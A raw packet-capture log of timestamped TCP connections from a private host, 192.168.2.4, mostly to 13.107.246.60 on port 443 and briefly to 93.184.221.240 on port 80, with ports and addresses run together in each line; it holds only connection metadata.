                                                Oct 30, 2024 00:22:55.987879992 CET58109443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:55.987967968 CET4435810913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.988100052 CET58109443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:55.988240004 CET58109443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:55.988276005 CET4435810913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.997155905 CET4435810613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.997529984 CET58106443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:55.997548103 CET4435810613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.997972012 CET58106443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:55.997975111 CET4435810613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:56.134496927 CET4435810613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:56.134643078 CET4435810613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:56.134706974 CET58106443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:56.134910107 CET58106443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:56.134928942 CET4435810613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:56.134943962 CET58106443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:56.134951115 CET4435810613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:56.138607979 CET58110443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:56.138629913 CET4435811013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:56.138734102 CET58110443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:56.138947964 CET58110443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:56.138959885 CET4435811013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:56.189809084 CET4435810513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:56.190078020 CET4435810513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:56.190181017 CET58105443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:56.190274000 CET58105443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:56.190274000 CET58105443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:56.190318108 CET4435810513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:56.190346003 CET4435810513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:56.190892935 CET4435810713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:56.191468954 CET58107443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:56.191490889 CET4435810713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:56.192069054 CET58107443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:56.192080975 CET4435810713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:56.193135977 CET58111443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:56.193227053 CET4435811113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:56.193324089 CET58111443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:56.193479061 CET58111443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:56.193511963 CET4435811113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:56.213639021 CET4435810813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:56.214179039 CET58108443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:56.214190006 CET4435810813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:56.214776039 CET58108443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:56.214781046 CET4435810813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:56.324284077 CET4435810713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:56.324405909 CET4435810713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:56.324487925 CET58107443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:56.324737072 CET58107443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:56.324795008 CET4435810713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:56.324835062 CET58107443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:56.324851990 CET4435810713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:56.328435898 CET58112443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:56.328479052 CET4435811213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:56.328577042 CET58112443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:56.328789949 CET58112443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:56.328804016 CET4435811213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:56.342784882 CET4435810813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:56.343075037 CET4435810813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:56.343144894 CET58108443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:56.343194008 CET58108443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:56.343204021 CET4435810813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:56.343226910 CET58108443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:56.343231916 CET4435810813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:56.345974922 CET58113443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:56.346065044 CET4435811313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:56.346154928 CET58113443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:56.346338987 CET58113443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:56.346374989 CET4435811313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:56.715632915 CET4435810913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:56.716442108 CET58109443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:56.716485977 CET4435810913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:56.717082024 CET58109443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:56.717101097 CET4435810913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:56.844541073 CET4435810913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:56.844676971 CET4435810913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:56.844759941 CET58109443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:56.845052004 CET58109443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:56.845052004 CET58109443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:56.845082998 CET4435810913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:56.845105886 CET4435810913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:56.848443985 CET58114443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:56.848491907 CET4435811413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:56.848566055 CET58114443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:56.848762989 CET58114443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:56.848781109 CET4435811413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:56.870822906 CET4435811013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:56.871525049 CET58110443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:56.871539116 CET4435811013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:56.871936083 CET58110443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:56.871939898 CET4435811013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:56.929519892 CET4435811113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:56.932954073 CET58111443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:56.933032036 CET4435811113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:56.934374094 CET58111443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:56.934387922 CET4435811113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:56.999772072 CET4435811013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:56.999975920 CET4435811013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.000209093 CET58110443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.000463009 CET58110443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.000474930 CET4435811013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.000523090 CET58110443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.000528097 CET4435811013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.007353067 CET58115443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.007421970 CET4435811513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.007555008 CET58115443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.007915020 CET58115443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.007946968 CET4435811513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.063962936 CET4435811113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.064620018 CET4435811113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.064760923 CET58111443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.064879894 CET58111443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.064909935 CET4435811113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.064941883 CET58111443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.064974070 CET4435811113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.071719885 CET58116443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.071768999 CET4435811613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.071852922 CET58116443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.072101116 CET58116443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.072118998 CET4435811613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.080420971 CET4435811313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.081054926 CET58113443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.081088066 CET4435811313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.082374096 CET58113443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.082386971 CET4435811313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.101015091 CET4435811213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.101846933 CET58112443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.101871967 CET4435811213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.103125095 CET58112443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.103133917 CET4435811213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.211909056 CET4435811313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.211993933 CET4435811313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.212233067 CET58113443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.212814093 CET58113443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.212814093 CET58113443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.212857962 CET4435811313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.212884903 CET4435811313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.219476938 CET58117443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.219578028 CET4435811713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.219733953 CET58117443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.220165014 CET58117443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.220196009 CET4435811713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.230881929 CET4435811213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.230950117 CET4435811213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.231004000 CET58112443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.231177092 CET58112443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.231192112 CET4435811213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.231206894 CET58112443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.231211901 CET4435811213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.234795094 CET58118443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.234870911 CET4435811813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.234957933 CET58118443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.235150099 CET58118443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.235172987 CET4435811813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.597794056 CET4435811413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.599114895 CET58114443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.599164963 CET4435811413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.600554943 CET58114443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.600562096 CET4435811413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.731770039 CET4435811413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.731872082 CET4435811413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.732002020 CET58114443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.732614040 CET58114443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.732635021 CET4435811413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.737905025 CET4435811513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.738888979 CET58115443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.738934040 CET4435811513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.739933968 CET58119443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.739981890 CET4435811913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.740098000 CET58119443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.740251064 CET58115443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.740268946 CET4435811513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.740641117 CET58119443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.740653992 CET4435811913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.807148933 CET4435811613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.808248043 CET58116443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.808284998 CET4435811613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.809911013 CET58116443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.809916973 CET4435811613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.865771055 CET4435811513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.865864038 CET4435811513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.865968943 CET58115443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.866468906 CET58115443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.866528034 CET4435811513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.866560936 CET58115443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.866576910 CET4435811513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.872153997 CET58120443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.872205973 CET4435812013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.872304916 CET58120443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.872509003 CET58120443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.872526884 CET4435812013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.955459118 CET4435811613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.955626011 CET4435811613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.955822945 CET58116443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.956269979 CET58116443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.956293106 CET4435811613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.956338882 CET58116443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.956346035 CET4435811613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.962522030 CET58121443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.962613106 CET4435812113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.962716103 CET58121443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.962923050 CET58121443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.962958097 CET4435812113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.968544006 CET4435811713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.969146967 CET58117443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.969175100 CET4435811713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.970506907 CET58117443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.970514059 CET4435811713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.978574038 CET4435811813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.979264021 CET58118443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.979294062 CET4435811813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:57.980418921 CET58118443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:57.980427027 CET4435811813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.099544048 CET4435811713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.099725008 CET4435811713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.099819899 CET58117443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.100047112 CET58117443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.100070953 CET4435811713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.100106001 CET58117443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.100111961 CET4435811713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.106190920 CET58122443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.106242895 CET4435812213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.106374979 CET58122443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.106883049 CET58122443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.106904030 CET4435812213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.107589006 CET4435811813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.108000994 CET4435811813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.108097076 CET58118443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.108186960 CET58118443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.108206034 CET4435811813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.108227015 CET58118443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.108233929 CET4435811813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.113109112 CET58123443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.113194942 CET4435812313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.113292933 CET58123443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.113459110 CET58123443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.113492966 CET4435812313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.586663008 CET4972380192.168.2.493.184.221.240
                                                Oct 30, 2024 00:22:58.586755037 CET4972480192.168.2.493.184.221.240
                                                Oct 30, 2024 00:22:58.631294966 CET4435811913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.631946087 CET58119443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.631983995 CET4435811913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.632458925 CET804972393.184.221.240192.168.2.4
                                                Oct 30, 2024 00:22:58.632519007 CET4972380192.168.2.493.184.221.240
                                                Oct 30, 2024 00:22:58.632556915 CET804972493.184.221.240192.168.2.4
                                                Oct 30, 2024 00:22:58.632616997 CET4972480192.168.2.493.184.221.240
                                                Oct 30, 2024 00:22:58.632664919 CET58119443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.632673025 CET4435811913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.757793903 CET4435812113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.758671999 CET58121443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.758744955 CET4435812113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.759355068 CET58121443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.759371996 CET4435812113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.761038065 CET4435812013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.761449099 CET58120443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.761483908 CET4435812013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.761992931 CET58120443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.762003899 CET4435812013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.826329947 CET4435811913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.826392889 CET4435811913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.826474905 CET58119443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.826699018 CET58119443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.826724052 CET4435811913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.826738119 CET58119443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.826745033 CET4435811913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.830302000 CET58124443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.830331087 CET4435812413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.830420971 CET58124443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.830600977 CET58124443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.830611944 CET4435812413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.841145992 CET4435812313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.841559887 CET58123443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.841583967 CET4435812313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.842164040 CET58123443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.842175007 CET4435812313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.847651958 CET4435812213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.847989082 CET58122443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.848021984 CET4435812213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.848448038 CET58122443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.848457098 CET4435812213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.890844107 CET4435812013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.890990019 CET4435812013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.891066074 CET58120443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.891236067 CET58120443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.891261101 CET4435812013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.891275883 CET58120443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.891283035 CET4435812013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.891483068 CET4435812113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.894861937 CET58125443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.894927979 CET4435812513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.895035982 CET58125443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.895045996 CET4435812113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.895111084 CET58121443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.895185947 CET58121443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.895185947 CET58121443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.895215988 CET4435812113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.895241976 CET4435812113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.895276070 CET58125443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.895308018 CET4435812513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.897674084 CET58126443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.897685051 CET4435812613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.897769928 CET58126443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.897906065 CET58126443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.897912025 CET4435812613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.970756054 CET4435812313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.970901966 CET4435812313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.970994949 CET58123443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.971205950 CET58123443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.971230984 CET4435812313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.971276045 CET58123443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.971290112 CET4435812313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.974647045 CET58127443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.974694967 CET4435812713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.974787951 CET58127443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.974987984 CET58127443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.975016117 CET4435812713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.979470015 CET4435812213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.979770899 CET4435812213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.979866982 CET58122443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.979866982 CET58122443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.979866982 CET58122443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.981936932 CET58128443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.981980085 CET4435812813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:58.982068062 CET58128443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.982181072 CET58128443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:58.982203960 CET4435812813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:59.289638996 CET58122443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:59.289702892 CET4435812213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:59.569853067 CET4435812413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:59.570580959 CET58124443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:59.570611000 CET4435812413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:59.571249962 CET58124443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:59.571254969 CET4435812413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:59.669872999 CET4435812613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:59.670453072 CET58126443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:59.670468092 CET4435812613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:59.671123028 CET58126443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:59.671127081 CET4435812613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:59.676995993 CET4435812513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:59.677319050 CET58125443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:59.677378893 CET4435812513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:59.677769899 CET58125443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:59.677788973 CET4435812513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:59.704453945 CET4435812413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:59.704969883 CET4435812413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:59.705024958 CET58124443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:59.705063105 CET58124443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:59.705076933 CET4435812413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:59.705091000 CET58124443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:59.705096006 CET4435812413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:59.708192110 CET58129443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:59.708285093 CET4435812913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:59.708374977 CET58129443192.168.2.413.107.246.60
